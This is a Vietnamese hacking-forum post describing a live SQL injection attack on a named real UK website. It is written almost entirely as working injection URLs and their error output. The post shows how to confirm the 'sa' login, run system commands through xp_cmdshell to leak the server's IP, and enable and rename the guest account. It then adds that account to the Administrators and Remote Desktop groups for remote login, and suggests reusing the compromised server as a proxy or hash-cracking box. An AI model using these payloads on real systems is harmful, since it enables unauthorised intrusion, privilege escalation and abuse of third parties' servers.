Skip to main content

Remote Desktop via user "SA" - SQL Injection

Thấy nhiều người hỏi cái này, mạn phép làm cái live show luôn ha
Link bug:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43'
+Check user:

Code:
http://www.funds4me.co.uk/stores.asp?catID=43'%20and%201=convert(int,system_user)--sp_password
Dính SA goài:68:
Trích:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int.
+Check ip srv:
Đầu tiên đổ kết quả của lệnh ipconfig vào table keke:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';drop%20table%20keke%20create%20table%20keke%20(id%20int%20identity,nd%20varchar(1000))%20insert%20into%20keke(nd)%20exec%20master..xp_cmdshell%20'ipconfig'--sp_password
Sau đó convert ra xem kq thoai:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43'%20and%201=convert(int,(select%20top%201%20nd%20from%20keke%20where%20nd%20like%20('%25Ip%20address%25')))--sp_password
Ra ip thật nè:
Trích:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 212.69.230.65 ' to a column of data type int.
+Add user và nâng quyền rồi tìm cách remote desktop vào:
Ở đây tôi chọn giải pháp active acc guest và nâng guest lên admin cho đỡ bị lộ

Active guest acc:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net user guest /active:yes';--sp_password
Set lại pass cho guest
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net user guest xxxxxx';--sp_password
Add guest vào admin group:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net localgroup administrators guest /add';--sp_password
Chắc nữa là add guest vào Remote Desktop group:

Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" guest /add';--sp_password
Dùng Remote Desktop vào srv 212.69.230.65 với acc guest/xxxxxx thôi
(pass đã change, ai thik thì tự tạo lại)

P/S: cái này mà tạo Virtual Private Srv fake ip rất good, hoặc để crack md5 pass hash.

Share this with your friends
Loading...